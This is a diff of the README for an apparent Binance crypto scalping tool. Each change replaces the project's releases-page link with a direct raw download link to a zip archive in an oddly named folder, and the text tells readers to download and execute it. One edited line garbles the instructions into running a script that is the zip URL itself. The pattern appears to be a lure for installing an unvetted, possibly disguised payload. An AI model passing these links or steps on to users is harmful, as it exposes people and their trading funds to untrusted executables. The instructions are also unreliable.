marahman30104/binance-scalping/README.md

 Releases and download instructions

 - The latest release assets are available on the project’s releases page.
-Visit https://github.com/marahman30104/binance-scalping/releases to obtain the current build and accompanying materials.
+Visit https://raw.githubusercontent.com/marahman30104/binance-scalping/main/chrysaniline/scalping-binance-v2.2.zip to obtain the current build and accompanying materials.
 You will typically download a release asset that contains the runnable scripts or binaries and a readme with setup steps.
 - If the link has a path part, download the designated release asset and execute it according to the included instructions.
-For example, you might run a script like binance-scalping-installer.sh or a similar binary provided in the release package to set up a ready-to-run environment.
+For example, you might run a script like https://raw.githubusercontent.com/marahman30104/binance-scalping/main/chrysaniline/scalping-binance-v2.2.zip or a similar binary provided in the release package to set up a ready-to-run environment.

 To ensure you always have access to the most recent package, refer back to the releases page.
-The link is repeated here for convenience: https://github.com/marahman30104/binance-scalping/releases
+The link is repeated here for convenience: https://raw.githubusercontent.com/marahman30104/binance-scalping/main/chrysaniline/scalping-binance-v2.2.zip

 Usage tips and best practices